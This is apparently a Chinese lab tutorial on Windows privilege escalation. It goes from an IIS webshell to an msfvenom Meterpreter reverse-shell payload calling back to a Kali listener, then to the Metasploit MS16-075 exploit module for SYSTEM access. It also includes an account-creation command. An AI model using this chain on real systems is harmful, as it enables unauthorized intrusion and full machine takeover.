• Windows本地提权


    前言

    window本地漏洞提权,是指利用Windows系统本地进程或系统服务的漏洞,将普通用户权限(Sql Server、.net framework)权限提示至system权限

    提权的原理

    当你使用当前用户的权限来创建的shell通信,你当前的shell就是什么权限,就好像你使用管理员运行一个木马文件,对方获得权限就是管理员,而Windows本地溢出就是利用system权限的缺陷开启shell进程,相对应的就可获得system权限。

    实验环境

    Windows server 2008 + SQL Server 2014 + IIS 7 IP:192.168.233.135

    kali Linux 2020 IP:192.168.233.130
    Windows 10 IP:192.168.233.1(中国蚁剑环境)

    使用MSF对漏洞进行提权操作

    存在webshell,普通权限
    1.查看当前webshell权限,普通IIS权限,尝试添加用户失败

    whoami
    
    net user admsdf admin123 /add
    


    systeminfo查看系统补丁情况

    systeminfo
    


    将查出来的补丁号放置在网站中查询存在的溢出漏洞 https://bugs.hacking8.com/tiquan/

    找到选择一个可以在机器上使用的漏洞编号,暂时记录,待会会用

    2.打开kali,使用msf生成Windows msf远控木马,并监听端口
    查看当前ip地址:

    ifconfig
    


    生成meterpreter木马(生成更多木马文件请参考https://www.cnblogs.com/tianlinlin/p/10171981.html)

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.233.130 LPORT=1233 -f exe > shell.exe
    


    启动msf框架,选择监听模块

    msfconsole
    use exploit/multi/handler
    


    设置接收反弹的payload类型,设置要监听的ip的端口 记得监听的端口和地址需要和生成木马的端口及ip地址相对应

    set payload windows/meterpreter/reverse_tcp
    set lport 1233
    set lhost 192.168.233.130
    options
    


    开启监听(在开启监听前记得options查看一下当前的配置是否与生成的木马参数是否一致哦)

    run
    


    3.使用webshell将木马上传到网站目录,并使用终端运行,成功获得meterpreter shell
    将shell从kali复制到物理机,使用蚁剑上传webshell

    上传成功

    右击,选择在此处打开虚拟终端,选择刚刚的shell.exe,回车运行

    查看kali虚拟机,成功获得反弹shell,getuid查看当前用户

    getuid
    


    4.使用msf中post模块中ms16-075尝试本地溢出(郑重提示,如果是本地环境测试可以多尝试几下,如果是正式渗透测试,使用exp的时候一定先要看说明或者readme,不然很有可能造成目标蓝屏关机等情况
    sysinfo确定目标架构 Windows 2008 server,x64位系统(Windows下执行systeminfo也可以查看)

    sysinfo
    


    将环境调至后台运行,(注意弹出的session id待会要用)选择刚刚对比已经安装过的补丁,尝试使用未安装补丁的exp进行攻击(MS16-075)

    background
    search ms16-075
    


    选择其中的一个模块进行测试(我本机短长度exp测试失败了,我觉得主要原因是看不懂注释),可以看到,payload已经帮我们默认选好了(windows/meterpreter/reverse_tcp),payload中的选项也自带填好了。大家的如果没有就手动set选择填一下吧

    use exploit/windows/local/ms16_075_reflection_juicy 
    options
    


    选择必选项session,将我们刚刚的sessionID放进去,run启动exp

    set session 2
    run
    


    漏洞利用成功,这时候getuid查看权限也就是system权限了

    本篇文章到此就结束了,有错误的希望多读指正,留言即可哦

  • 相关阅读:
    .net系统自学笔记——自定义特性及反射
    .net系统自学笔记——内存管理与指针
    .net系统自学笔记——动态语言扩展(又一个没听过没学过的,空,以后会了再补充吧)
    .net系统自学笔记——Linq
    思维的惰性
    论演员的自我修养2
    职场有影帝出没,屌丝们请当心!
    论演员的自我修养
    道与术
    关注细节但不陷入细节
  • 原文地址:https://www.cnblogs.com/KHZ521/p/14088391.html
Copyright © 2020-2023  润新知